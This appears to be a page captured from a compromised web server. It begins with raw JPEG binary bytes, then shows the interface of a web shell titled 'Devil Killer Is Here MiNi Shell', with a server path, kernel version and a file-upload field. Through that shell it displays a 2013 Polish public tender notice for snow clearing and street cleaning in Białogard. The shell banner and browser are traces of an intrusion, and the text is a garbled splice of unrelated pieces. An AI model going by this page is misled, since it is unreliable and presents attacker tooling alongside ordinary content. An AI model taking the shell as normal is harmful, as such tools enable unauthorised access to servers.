JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131023/222079-N-2013.html

<p class="kh_header"><b>Białogard: usługi związane z prowadzeniem akcji zimowej na ulicach i chodnikach miasta Białogard w sezonie 2013/2014</b><br>
<b>Numer ogłoszenia: 222079 - 2013; data zamieszczenia: 23.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białogard - Urząd Miasta Białogardu , ul. 1-go Maja 18, 78-200 Białogard, woj. zachodniopomorskie, tel. 094 3122310, faks 094 3122919.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialogard.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi związane z prowadzeniem akcji zimowej na ulicach i chodnikach miasta Białogard w sezonie 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi związane z prowadzeniem akcji zimowej na ulicach i chodnikach miasta Białogard w sezonie 2013/2014 w podziale na 2 zadania:
1) Zadanie nr 1 - odśnieżanie chodników w terminie od dnia 08.11.20132 r. do dnia 31.03.2014 r.,
2) Zadanie nr 2 - odśnieżanie ulic w terminie od dnia 18.11.2013 r. do dnia 17.03.2014 r.
2. Szczegółowy zakres zamówienia obejmuje:
1) utrzymanie chodników, w tym:
a) odśnieżanie chodników;
b) likwidację śliskości zimowej (gołoledzi), poprzez posypywanie chodników, placów i parkingów mieszanką solno-piaskową, którą zapewnia wykonawca,
c) zimowe utrzymanie przystanków, pętli i zatok autobusowych poprzez odśnieżanie i posypywanie mieszanką solno-piaskową, którą zapewnia wykonawca,
d) wywóz zwałów nagromadzonego śniegu;
e) zebranie z chodników, placów i parkingów nagromadzonego piasku pozostałego po posypywaniu chodników,
f) skuwanie z lodu chodników i kratek kanalizacji deszczowej.
2) w przypadku braku śniegu bieżące utrzymanie czystości na terenie miasta Białogard obejmujące 
w szczególności:
a) usuwanie odpadów komunalnych wzdłuż krawężników, oraz na szerokość 75 cm w stronę osi jezdni (w razie wystąpienia konieczności usuwanie ich z całej szerokości jezdni),
b) usuwanie odpadów komunalnych w tym opadłych liści z chodników, placów,  parkingów 
oraz terenów zieleni miejskiej leżących bezpośrednio przy chodnikach,
c) zbieranie i pozbywanie się odpadów zgromadzonych w pojemnikach do tego przeznaczonych 
i utrzymywanie tych pojemników w odpowiednim stanie sanitarnym i porządkowym,
d) zamiatanie i usuwanie odpadów z przystanków, pętli i zatok autobusowych, 
e) usuwanie zwłok zwierząt z terenu miasta Białogard na podstawie odrębnych zleceń. Zwłoki zwierząt utylizowane będą w Zakładzie Struga S.A. Punkt Pozyskiwania i Przeładunku Surowców Utylizacyjnych w Karlinie, ul. Kołobrzeska 13, lub podobnym. Wykonawca okazywać będzie zamawiającemu potwierdzenia utylizacji zwłok zwierząt.

Wykaz chodników i placów podlegających odśnieżaniu zamieszczono w załączniku A, natomiast terenów podlegających oczyszczaniu (w przypadku braku opadów śnieżnych) zamieszczono w załączniku B, wykaz przystanków stanowi załącznik C.
3) utrzymanie ulic, w tym:
a) odśnieżanie jezdni;
b) likwidacja śliskości zimowej (gołoledzi), poprzez posypywanie jezdni mieszanką solno-piaskową, którą zapewnia wykonawca,
c) wywóz zwałów nagromadzonego śniegu.
Wykaz ulic podlegających odśnieżaniu zamieszczono w załączniku D.
3. Dodatkowe wymogi:
1) Odśnieżanie ulic i chodników powinno odbywać się w taki sposób aby przejścia dla pieszych nie były blokowane zwałami śniegu, umożliwiając swobodne przechodzenie pieszych przez ulice.
2) Wymagany ilościowy skład mieszanki solno-piaskowej ma zawierać nie mniej 25% soli drogowej, a zużycie mieszanki solno-piaskowej nie może być mniejsze niż 100 g na 1 m 2 powierzchni.
3) Sprzątanie chodników odbywać się będzie każdego dnia tygodnia z wyjątkiem niedziel i świąt, od godziny 5°° tylko w przypadku braku śniegu na ulicach i chodnikach oraz po uprzednim ustaleniu czynności z Zamawiającym. 
4) Odśnieżanie chodników odbywać się będzie od godziny 500. Dodatkowe wykonywanie czynności (w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia ) odbywać się będzie:
-w dni robocze (od poniedziałki do piątku) - na pisemnie, telefoniczne lub  faxem - polecenie Zamawiającego, 
-w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego.
5) W przypadku odśnieżania ulic czynności wykonywane będą od godziny 4°°, z zastrzeżeniem, że po raz pierwszy wykonywanie czynności objętych zamówieniem rozpocznie się po uprzednim zawiadomieniu Wykonawcy przez Zamawiającego. Dodatkowe wykonywanie czynności  (w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia) odbywać się będzie:
-w dni robocze (od poniedziałku do piątku) - na pisemnie , telefoniczne lub  faxem - polecenie Zamawiającego, 
-w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego.
6) W przypadku nagromadzenia się znacznej ilości śniegu zgarniętego z chodników, placów i jezdni utrudniającego ruch pojazdów i pieszych, decyzję o jego usunięciu podejmie Zamawiający, a Wykonawca zobowiązany jest usunąć i wywieźć śnieg na miejsce wskazane przez Zamawiającego. 
7) Zamawiający określi czas i miejsca zbierania nagromadzonego piasku.
8) Zamawiający zastrzega sobie posiadanie z Wykonawcą łączności (telefon, telefon komórkowy, fax) 
o każdej porze dnia i nocy.
9) Zamawiający zastrzega sobie prawo do zawieszenia trwania akcji zimowej (utrzymania w gotowości sprzętu do akcji zimowej), jeżeli warunki pogodowe będą korzystne oraz temperatura dodatnia, przez okres 3 dni, bez ponoszenia dodatkowych kosztów z tytułu zawieszenia akcji.
10) Przed podpisaniem umowy Wykonawca złoży Zamawiającemu harmonogram prac:
a) chodniki: na odśnieżanie i na sprzątanie w przypadku braku śniegu,
b) ulice: na odśnieżanie.
11) Wykonawca jako wytwórca i posiadacz odpadów komunalnych zobowiązany jest do:
a) wskazania tytułu prawnego do terenu, na którym będzie wstępnie magazynował zebrane odpady komunalne do czasu ich odbioru przez uprawnionego przedsiębiorcę,
b) wyposażenia nieruchomości w pojemniki służące do zbierania odpadów komunalnych zgodnie  z Regulaminem Utrzymania Czystości i Porządku na terenie Miasta Białogard oraz utrzymywania tych pojemników w odpowiednim stanie sanitarnym, porządkowym i technicznym,
c) wstępnego magazynowania zebranych odpadów komunalnych na terenie nieruchomości do której ma tytuł prawny do czasu ich odbioru przez uprawnionego przedsiębiorcę,
d) złożenia do Burmistrza Białogardu deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi w terminie 14 dni od dnia rozpoczęcia wstępnego magazynowania zebranych odpadów komunalnych,
e) ponoszenia na rzecz Miasta Białogard opłaty za gospodarowanie odpadami komunalnymi,
f) prowadzenia dokumentacji, na podstawie której przedłoży na koniec okresu realizacji umowy informacje określające ilość zebranych odpadów komunalnych oraz poszczególnych rodzajów selektywnie zebranych odpadów komunalnych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy Pzp, stanowiących nie więcej niż 15 % wartości realizowanego zamówienia i polegających na powtórzeniu usług tego samego rodzaju.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku - warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej  jedno zamówienie o wartości brutto:
- w przypadku składania oferty dotyczącej odśnieżania chodników (zadanie nr 1): 150.000,00 PLN,
- w przypadku składania oferty dotyczącej odśnieżania ulic (zadanie nr 2): 150.000,00 PLN,
- w przypadku składania oferty przez jednego Wykonawcę na dwie części zamówienia (odśnieżanie chodników i ulic): 2 zamówienia o wartości 150.000,00 PLN każde
odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia. Przez  zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia Zamawiający uzna wykonanie usług związanych z odśnieżaniem chodników i ulic.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku - warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował:
-w przypadku składania oferty dotyczącej odśnieżania chodników (zadanie nr 1): min. 3 ciągniki 
lub inne pojazdy z przyczepami, min. 3 pługi, min. 3 piaskarki, min 8 wózków na piasek, zmiotki 
i odpady, pozostały sprzęt typu łopaty do śniegu, miotły, skuwaki do lodu, itp.
-w przypadku składania oferty dotyczącej odśnieżania ulic (zadanie nr 2): min. 4 ciągniki lub inne pojazdy z przyczepami, min. 4 pługi, min. 4 piaskarki;
-w przypadku składania ofert przez jednego Wykonawcę na dwie części zamówienia (odśnieżanie chodników i ulic) należy posiadać wymagany sprzęt w ilości łącznej tj.: min. 7 ciągników lub innych pojazdów z przyczepami, min. 7 pługów, min. 7 piaskarek, min 8 wózków na piasek, zmiotki 
i odpady, pozostały sprzęt typu łopaty do śniegu, miotły, skuwaki do lodu, itp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku - warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował:
-w przypadku składania oferty dotyczącej odśnieżania chodników (zadanie nr 1): 10 osobami zdolnymi do wykonania przedmiotu zamówienia, w tym co najmniej 3 osobami  posiadającymi uprawnienia do kierowania ciągnikiem lub innym pojazdem z przyczepą,
-w przypadku składania oferty dotyczącej odśnieżania ulic (zadanie nr 2): 8 osobami zdolnymi 
do wykonania przedmiotu zamówienia, w tym co najmniej 4 osobami posiadającymi uprawnienia 
do kierowania ciągnikiem lub innym pojazdem z przyczepą,
w przypadku składania ofert przez jednego Wykonawcę na dwie części zamówienia (odśnieżanie chodników i ulic): 18 osobami zdolnymi do wykonania przedmiotu zamówienia, w tym co najmniej 7 osobami  posiadającymi uprawnienia do kierowania ciągnikiem lub innym pojazdem z przyczepą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku: warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100 000,00 zł (jeżeli ubezpieczenie nie obejmuje całego okresu objętego zamówieniem Wykonawca zobowiązuje się do dostarczenia dla Zamawiającego najpóźniej 7 dni przed wygaśnięciem poprzedniej polisy, kserokopii poświadczonej za zgodność z oryginałem nowej polisy ubezpieczeniowej przedłużającej okres ubezpieczenia z zachowaniem ciągłości ubezpieczenia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, 
na  podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach:
1)	wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzenia SIWZ 
i podpisywania  umowy, a które są niezbędne dla prawidłowej realizacji zamówienia;
2)	wystąpienia okoliczności skutkujących koniecznością zmiany terminu realizacji zamówienia w związku z:
a)	działaniem siły wyższej w rozumieniu w rozumieniu przepisów Kodeksu cywilnego,
b)	innymi okolicznościami niepowstałymi z winy Wykonawcy,
c)	koniecznością wykonania zamówień uzupełniających.
Zmiany umowy w zakresie dopuszczalnym przez ustawę Prawo zamówień publicznych wymagają dla swej ważności formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.bialogard.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Białogard - Urząd Miasta Białogard 
ul. 1-go Maja 18 
78-200 Białogard 
Wydział Inwestycji i Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2013 godzina 10:00, miejsce: Miasto Białogard - Urząd Miasta Białogard 
ul. 1-go Maja 18 
78-200 Białogard 
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> odśnieżanie chodników w terminie od dnia 08.11.20132 r. do dnia 31.03.2014 r.,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) utrzymanie chodników, w tym:
a) odśnieżanie chodników;
b) likwidację śliskości zimowej (gołoledzi), poprzez posypywanie chodników, placów i parkingów mieszanką solno-piaskową, którą zapewnia wykonawca,
c) zimowe utrzymanie przystanków, pętli i zatok autobusowych poprzez odśnieżanie i posypywanie mieszanką solno-piaskową, którą zapewnia wykonawca,
d) wywóz zwałów nagromadzonego śniegu;
e) zebranie z chodników, placów i parkingów nagromadzonego piasku pozostałego po posypywaniu chodników,
f) skuwanie z lodu chodników i kratek kanalizacji deszczowej.
2) w przypadku braku śniegu bieżące utrzymanie czystości na terenie miasta Białogard obejmujące 
w szczególności:
a) usuwanie odpadów komunalnych wzdłuż krawężników, oraz na szerokość 75 cm w stronę osi jezdni (w razie wystąpienia konieczności usuwanie ich z całej szerokości jezdni),
b) usuwanie odpadów komunalnych w tym opadłych liści z chodników, placów,  parkingów 
oraz terenów zieleni miejskiej leżących bezpośrednio przy chodnikach,
c) zbieranie i pozbywanie się odpadów zgromadzonych w pojemnikach do tego przeznaczonych 
i utrzymywanie tych pojemników w odpowiednim stanie sanitarnym i porządkowym,
d) zamiatanie i usuwanie odpadów z przystanków, pętli i zatok autobusowych, 
e) usuwanie zwłok zwierząt z terenu miasta Białogard na podstawie odrębnych zleceń. Zwłoki zwierząt utylizowane będą w Zakładzie Struga S.A. Punkt Pozyskiwania i Przeładunku Surowców Utylizacyjnych w Karlinie, ul. Kołobrzeska 13, lub podobnym. Wykonawca okazywać będzie zamawiającemu potwierdzenia utylizacji zwłok zwierząt.


Wykaz chodników i placów podlegających odśnieżaniu zamieszczono w załączniku A, natomiast terenów podlegających oczyszczaniu (w przypadku braku opadów śnieżnych) zamieszczono w załączniku B, wykaz przystanków stanowi załącznik C.
